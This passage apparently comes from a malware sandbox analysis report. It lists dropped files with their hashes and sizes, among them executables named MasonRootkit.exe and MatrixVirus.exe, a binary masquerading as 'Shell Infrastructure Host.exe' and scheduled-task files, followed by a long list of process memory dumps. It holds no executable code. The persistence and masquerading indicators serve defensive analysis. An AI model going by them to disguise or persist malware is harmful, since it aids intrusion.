638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
85c81dabc726de9ee51770c9252945db

SHA1
833e400b670e32bdae4ba7c0dc510abb228e1cfb

SHA256
5c4c15a1fdb70ff7f2d838e92b4710b02a99155b5226588b5e1571f1a54f41f7

SHA512
ca0213dc31475de73a402abdbbdb133de81f5622d7b94df26fe6e13ea0afd2912f727b31a9242ddddcd3523570bcddbad0f189b64ac9154a31c169eeee25019f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
cd1887ad861be8e742d65b1b04159c45

SHA1
5a2315052117689690ed4a49d8cd1b621b3983d2

SHA256
a49c6f363deeae886720cc2b8ebae28f23c7105d1a24b7064e9833851dcb99f3

SHA512
e8c41c917d210aa0e97c504989301a4e6212ff2349584a0e1193d50bd17ec3185796d9ff42037f1f166d43bc363e7de753c2d93bf8bcd95f5d928b53a5ba1310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
f62f78af994f78a054cdb86e2b5a351f

SHA1
0850827040e717bffed0d115d9e9c75ae8c263d3

SHA256
23e1e6b54dc2cd34aeab8ab2c634ed9202ed464903afae03b80c0c3f93e7bb6a

SHA512
efa0cd3cc766d5b8936076d7ac9c220e91fc12d7ddc3157227e663b832568d2636f62ad38fee7615c9c9665785c36fd3c527ebd12bc7c4aa862b4c8be3a1feda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
dbe720e08242b89082f44448881bbffe

SHA1
f97cf51be5c82a7d89e941c0b0d6f0d1dc8ca10a

SHA256
e3bc5ff63835d0b2d5fbcbde0a779a369ad553d37222083f929fec7c087f528a

SHA512
05d75f0d2ebbc220c0348f97025d4a0b74b2489b02fc6785d5ac28462678373e8662bc03eb5e2e596750f3daeff138dcbd8bcad845b0e7d5e72934404092a036

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c63bf7a794d56dbf4acc24911ea14194

SHA1
44aadf6ee3b67a876cda26a9d8fa3e0159a917d9

SHA256
8eaae9a828890e45410f2e2b595df73e06452736c51fd74d3b545022445e448f

SHA512
bc1939182afb21c6e84fab1b4bdde869fad1663dc490e5388be2b9acabdd9db213f95a0e7de1b79fe0c2873fd0651904423a2ecf5eeadbf9f2686b8e8e951541

Download Submit
C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe

Filesize
612KB

MD5
5e1eb1a67d40ccae40dee2a037ca6c64

SHA1
786b54d3d451ea40faeeb20fd30a38744862eeb5

SHA256
80e5cb11ae2512da3b7be501b469d6fc1a69a2017a143b9897023da9e366325f

SHA512
0484da209f0c8edff5d1f08b841f3134008ff72fb563fa48a15f96c8ad23fdfb82cc8a59bc729f2db3d359e18558d6f4fbaf4b40955a38787472db438a043205

Download Submit
C:\Users\Admin\AppData\Local\Temp\MatrixVirus.exe

Filesize
14KB

MD5
13e1f4bc5b116e4ec87f055715563193

SHA1
9eea7e9fce555b6c35730ec3dba29a13921f53f1

SHA256
5906dc7c3cd938b874cfb12cd9a14a6e72116c31385f4584f997f1544e3da492

SHA512
a53f446a2063684e401ad8c7da70ea7be4d23a2043341d9ab280dd36a1e91ef43b11ff510405125b957d88f5d9c7c00edb35977d8fe512e6fd0236f6447a030f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yh51ctfh.3ot.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9E92.tmp.bat

Filesize
164B

MD5
dac8aa86efa90ca046c14750db247d93

SHA1
b818884f2ea6bf9e348e248b82cdd5a5a3d0d0a4

SHA256
60e9a0d9f676c1aa4050f575955810ea6e565a7be4b652fe3edb2dcb63a30666

SHA512
c537138b4376859efca4bfea9b17e9efb0d189a10770bb43947a0b10f4cd126d2107028bd3a3d46037a6ce3bb466c29555685e5806d07c4b056abc2dc3ff2d3f

Download Submit
C:\Windows\Shell Infrastructure Host.exe

Filesize
55KB

MD5
cc846067069513e0ec3d9ccc42426662

SHA1
308c7d82ec6ba094e0d40d35a3ff042ce38974f1

SHA256
36b04768d3e0cfa350dc7f910305c580138c5af7a9f7b234f9530f36e9efab17

SHA512
5a12d153d5eeab4a6c6abbc7ebf084daa2edbebdce24746174be78bf8d551a3e4e86e4719b0d6c7616ee5f15174a4a5e2a0dda135fdff989797a55da478a1f93

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
memory/64-3917-0x00000000003C0000-0x00000000003D4000-memory.dmp

Filesize
80KB

Download
memory/220-3016-0x00000000000E0000-0x00000000000F4000-memory.dmp

Filesize
80KB

Download
memory/316-1360-0x0000024D99830000-0x0000024D999EB000-memory.dmp

Filesize
1.7MB

Download
memory/316-1362-0x0000024D99830000-0x0000024D999EB000-memory.dmp

Filesize
1.7MB

Download
memory/316-1361-0x0000024D99830000-0x0000024D999EB000-memory.dmp

Filesize
1.7MB

Download
memory/316-1365-0x00007FF805470000-0x00007FF805480000-memory.dmp

Filesize
64KB

Download
memory/316-1364-0x0000024D99830000-0x0000024D999EB000-memory.dmp

Filesize
1.7MB

Download
memory/316-1363-0x0000024D99830000-0x0000024D999EB000-memory.dmp

Filesize
1.7MB

Download
memory/388-324-0x00007FF827100000-0x00007FF827BC1000-memory.dmp

Filesize
10.8MB

Download
memory/388-12-0x00007FF827103000-0x00007FF827105000-memory.dmp

Filesize
8KB

Download
memory/388-11-0x00000000005E0000-0x00000000005F4000-memory.dmp

Filesize
80KB

Download
memory/388-571-0x00007FF827100000-0x00007FF827BC1000-memory.dmp

Filesize
10.8MB

Download
memory/388-490-0x000000001C6E0000-0x000000001C6F2000-memory.dmp

Filesize
72KB

Download
memory/616-1342-0x000001CE2A2E0000-0x000001CE2A41E000-memory.dmp

Filesize
1.2MB

Download
memory/616-1345-0x000001CE2BEB0000-0x000001CE2C06B000-memory.dmp

Filesize
1.7MB

Download
memory/616-1343-0x000001CE2BEB0000-0x000001CE2C06B000-memory.dmp

Filesize
1.7MB

Download
memory/616-1344-0x000001CE2BEB0000-0x000001CE2C06B000-memory.dmp

Filesize
1.7MB

Download
memory/616-1348-0x00007FF805470000-0x00007FF805480000-memory.dmp

Filesize
64KB

Download
memory/616-1347-0x000001CE2BEB0000-0x000001CE2C06B000-memory.dmp

Filesize
1.7MB

Download
memory/616-1346-0x000001CE2BEB0000-0x000001CE2C06B000-memory.dmp

Filesize
1.7MB

Download
memory/672-1356-0x00007FF805470000-0x00007FF805480000-memory.dmp

Filesize
64KB

Download
memory/672-1355-0x000002017E9E0000-0x000002017EB9B000-memory.dmp

Filesize
1.7MB

Download
memory/672-1354-0x000002017E9E0000-0x000002017EB9B000-memory.dmp

Filesize
1.7MB

Download
memory/672-1351-0x000002017E9E0000-0x000002017EB9B000-memory.dmp

Filesize
1.7MB

Download
memory/672-1353-0x000002017E9E0000-0x000002017EB9B000-memory.dmp

Filesize
1.7MB

Download
memory/672-1352-0x000002017E9E0000-0x000002017EB9B000-memory.dmp

Filesize
1.7MB

Download
memory/736-1399-0x000001E000F40000-0x000001E0010FB000-memory.dmp

Filesize
1.7MB

Download
memory/736-1395-0x000001E000F40000-0x000001E0010FB000-memory.dmp

Filesize
1.7MB

Download
memory/736-1396-0x000001E000F40000-0x000001E0010FB000-memory.dmp

Filesize
1.7MB

Download
memory/736-1397-0x000001E000F40000-0x000001E0010FB000-memory.dmp

Filesize
1.7MB

Download
memory/736-1398-0x000001E000F40000-0x000001E0010FB000-memory.dmp

Filesize
1.7MB

Download
memory/736-1400-0x00007FF805470000-0x00007FF805480000-memory.dmp

Filesize
64KB

Download
memory/820-272-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/920-3581-0x0000000000930000-0x0000000000944000-memory.dmp

Filesize
80KB

Download
memory/956-1371-0x0000027A58210000-0x0000027A583CB000-memory.dmp

Filesize
1.7MB

Download
memory/956-1368-0x0000027A58210000-0x0000027A583CB000-memory.dmp

Filesize
1.7MB

Download
memory/956-1369-0x0000027A58210000-0x0000027A583CB000-memory.dmp

Filesize
1.7MB

Download
memory/956-1367-0x0000027A58210000-0x0000027A583CB000-memory.dmp

Filesize
1.7MB

Download
memory/956-1370-0x0000027A58210000-0x0000027A583CB000-memory.dmp

Filesize
1.7MB

Download
memory/956-1372-0x00007FF805470000-0x00007FF805480000-memory.dmp

Filesize
64KB

Download
memory/1036-305-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/1076-326-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/1148-1417-0x0000027383280000-0x000002738343B000-memory.dmp

Filesize
1.7MB

Download
memory/1148-1421-0x00007FF805470000-0x00007FF805480000-memory.dmp

Filesize
64KB

Download
memory/1148-1420-0x0000027383280000-0x000002738343B000-memory.dmp

Filesize
1.7MB

Download
memory/1148-1419-0x0000027383280000-0x000002738343B000-memory.dmp

Filesize
1.7MB

Download
memory/1148-1418-0x0000027383280000-0x000002738343B000-memory.dmp

Filesize
1.7MB

Download
memory/1148-1416-0x0000027383280000-0x000002738343B000-memory.dmp

Filesize
1.7MB

Download
memory/1156-1425-0x000001FF85C00000-0x000001FF85DBB000-memory.dmp

Filesize
1.7MB

Download
memory/1156-1426-0x000001FF85C00000-0x000001FF85DBB000-memory.dmp

Filesize
1.7MB

Download
memory/1156-1424-0x000001FF85C00000-0x000001FF85DBB000-memory.dmp

Filesize
1.7MB

Download
memory/1156-1423-0x000001FF85C00000-0x000001FF85DBB000-memory.dmp

Filesize
1.7MB

Download
memory/1228-3762-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1532-2994-0x0000000000D40000-0x0000000000D54000-memory.dmp

Filesize
80KB

Download
memory/1832-2412-0x0000000000720000-0x0000000000734000-memory.dmp

Filesize
80KB

Download
memory/2216-2289-0x0000000000670000-0x0000000000684000-memory.dmp

Filesize
80KB

Download
memory/2380-517-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/2408-2919-0x0000000000440000-0x0000000000454000-memory.dmp

Filesize
80KB

Download
memory/2692-2667-0x0000000000990000-0x00000000009A4000-memory.dmp

Filesize
80KB

Download
memory/2692-218-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/3172-152-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/3316-174-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/3440-184-0x000001F931A50000-0x000001F931C12000-memory.dmp

Filesize
1.8MB

Download
memory/3440-185-0x000001F932150000-0x000001F932678000-memory.dmp

Filesize
5.2MB

Download
memory/3440-115-0x000001F917290000-0x000001F9172B2000-memory.dmp

Filesize
136KB

Download
memory/3504-2805-0x00000000008C0000-0x00000000008D4000-memory.dmp

Filesize
80KB

Download
memory/3512-51-0x0000000006220000-0x000000000626C000-memory.dmp

Filesize
304KB

Download
memory/3512-94-0x0000000006160000-0x000000000617E000-memory.dmp

Filesize
120KB

Download
memory/3512-186-0x0000000007290000-0x00000000072AA000-memory.dmp

Filesize
104KB

Download
memory/3512-25-0x0000000005640000-0x0000000005994000-memory.dmp

Filesize
3.3MB

Download
memory/3512-17-0x0000000004B30000-0x0000000004B52000-memory.dmp

Filesize
136KB

Download
memory/3512-14-0x00000000022F0000-0x0000000002326000-memory.dmp

Filesize
216KB

Download
memory/3512-130-0x00000000071D0000-0x0000000007266000-memory.dmp

Filesize
600KB

Download
memory/3512-128-0x0000000006FB0000-0x0000000006FBA000-memory.dmp

Filesize
40KB

Download
memory/3512-50-0x0000000005C10000-0x0000000005C2E000-memory.dmp

Filesize
120KB

Download
memory/3512-116-0x0000000007580000-0x0000000007BFA000-memory.dmp

Filesize
6.5MB

Download
memory/3512-117-0x0000000006F40000-0x0000000006F5A000-memory.dmp

Filesize
104KB

Download
memory/3512-84-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/3512-83-0x0000000006C00000-0x0000000006C32000-memory.dmp

Filesize
200KB

Download
memory/3512-95-0x0000000006E40000-0x0000000006EE3000-memory.dmp

Filesize
652KB

Download
memory/3644-373-0x00007FF8453F0000-0x00007FF8455E5000-memory.dmp

Filesize
2.0MB

Download
memory/3644-372-0x000002CB3FD30000-0x000002CB3FDCA000-memory.dmp

Filesize
616KB

Download
memory/3644-374-0x00007FF844210000-0x00007FF8442CE000-memory.dmp

Filesize
760KB

Download
memory/3900-3638-0x0000000000330000-0x0000000000344000-memory.dmp

Filesize
80KB

Download
memory/4260-15-0x00000000054B0000-0x0000000005AD8000-memory.dmp

Filesize
6.2MB

Download
memory/4260-141-0x0000000007910000-0x0000000007921000-memory.dmp

Filesize
68KB

Download
memory/4260-105-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/4428-187-0x0000000007EB0000-0x0000000007EB8000-memory.dmp

Filesize
32KB

Download
memory/4428-18-0x0000000006180000-0x00000000061E6000-memory.dmp

Filesize
408KB

Download
memory/4428-118-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/4428-167-0x0000000007DD0000-0x0000000007DDE000-memory.dmp

Filesize
56KB

Download
memory/4428-19-0x00000000061F0000-0x0000000006256000-memory.dmp

Filesize
408KB

Download
memory/4428-169-0x0000000007DE0000-0x0000000007DF4000-memory.dmp

Filesize
80KB

Download
memory/4540-198-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/4596-431-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/4628-410-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/4660-228-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/4888-3764-0x0000000000C10000-0x0000000000C24000-memory.dmp

Filesize
80KB

Download
memory/4940-391-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/4948-347-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/4996-3337-0x0000000000D40000-0x0000000000D54000-memory.dmp

Filesize
80KB

Download
memory/5196-271-0x0000000000B00000-0x0000000000BA0000-memory.dmp

Filesize
640KB

Download
memory/5196-292-0x000000001B6D0000-0x000000001B768000-memory.dmp

Filesize
608KB

Download
memory/5248-451-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/5520-3821-0x0000000000480000-0x0000000000494000-memory.dmp

Filesize
80KB

Download
memory/5532-3218-0x0000000000780000-0x0000000000794000-memory.dmp

Filesize
80KB

Download
memory/5576-471-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/5588-3101-0x0000000000F00000-0x0000000000F14000-memory.dmp

Filesize
80KB

Download
memory/5668-4134-0x0000000000970000-0x0000000000984000-memory.dmp

Filesize
80KB

Download
memory/5712-4075-0x0000000000C00000-0x0000000000C14000-memory.dmp

Filesize
80KB

Download
memory/5736-3929-0x00000000001C0000-0x00000000001D4000-memory.dmp

Filesize
80KB

Download
memory/5872-3250-0x0000000000870000-0x0000000000884000-memory.dmp

Filesize
80KB

Download
memory/5888-491-0x0000000070370000-0x00000000703BC000-memory.dmp

Filesize
304KB

Download
memory/5912-386-0x0000000140000000-0x00000001401A1000-memory.dmp

Filesize
1.6MB

Download
memory/5912-388-0x00007FF844210000-0x00007FF8442CE000-memory.dmp

Filesize
760KB

Download
memory/5912-387-0x00007FF8453F0000-0x00007FF8455E5000-memory.dmp

Filesize
2.0MB

Download
memory/5912-384-0x0000000140000000-0x00000001401A1000-memory.dmp

Filesize
1.6MB

Download
memory/5912-1330-0x0000000140000000-0x00000001401A1000-memory.dmp

Filesize
1.6MB

Download
memory/6124-2940-0x0000000000C20000-0x0000000000C34000-memory.dmp

Filesize
80KB

Download
memory/6340-3964-0x0000000000E50000-0x0000000000E64000-memory.dmp

Filesize
80KB

Download
memory/6380-4311-0x0000000000350000-0x0000000000364000-memory.dmp

Filesize
80KB

Download
memory/6448-4278-0x0000000000DC0000-0x0000000000DD4000-memory.dmp

Filesize
80KB

Download
memory/6572-2856-0x00000000005B0000-0x00000000005C4000-memory.dmp

Filesize
80KB

Download
memory/6616-3697-0x00000000009C0000-0x00000000009D4000-memory.dmp

Filesize
80KB

Download
memory/6656-2880-0x0000000000250000-0x0000000000264000-memory.dmp

Filesize
80KB

Download
memory/6712-2268-0x00000000002B0000-0x00000000002C4000-memory.dmp

Filesize
80KB

Download
memory/6732-4045-0x0000000000700000-0x0000000000714000-memory.dmp

Filesize
80KB

Download
memory/6896-2381-0x00000000003A0000-0x00000000003B4000-memory.dmp

Filesize
80KB

Download
memory/6948-3269-0x00000000008F0000-0x0000000000904000-memory.dmp

Filesize
80KB

Download
memory/6968-3533-0x0000000000BB0000-0x0000000000BC4000-memory.dmp

Filesize
80KB

Download
memory/6980-3049-0x0000000000990000-0x00000000009A4000-memory.dmp

Filesize
80KB

Download
memory/6984-3420-0x0000000000540000-0x0000000000554000-memory.dmp

Filesize
80KB

Download
memory/7064-4349-0x00000000003D0000-0x00000000003E4000-memory.dmp

Filesize
80KB

Download
memory/7176-2316-0x0000000000420000-0x0000000000434000-memory.dmp

Filesize
80KB

Download
memory/7368-2638-0x0000000000120000-0x0000000000134000-memory.dmp

Filesize
80KB

Download
memory/7392-2457-0x0000000000A80000-0x0000000000A94000-memory.dmp

Filesize
80KB

Download
memory/7528-3439-0x0000000000930000-0x0000000000944000-memory.dmp

Filesize
80KB

Download
memory/7600-4229-0x0000000000140000-0x0000000000154000-memory.dmp

Filesize
80KB

Download
memory/7688-3784-0x0000000000EE0000-0x0000000000EF4000-memory.dmp

Filesize
80KB

Download
memory/7724-4199-0x00000000003A0000-0x00000000003B4000-memory.dmp

Filesize
80KB

Download
memory/7768-2486-0x0000000000FD0000-0x0000000000FE4000-memory.dmp

Filesize
80KB

Download
memory/7784-3305-0x00000000007D0000-0x00000000007E4000-memory.dmp

Filesize
80KB

Download
memory/8048-2743-0x0000000000930000-0x0000000000944000-memory.dmp

Filesize
80KB

Download
memory/8180-4172-0x00000000002D0000-0x00000000002E4000-memory.dmp

Filesize
80KB

Download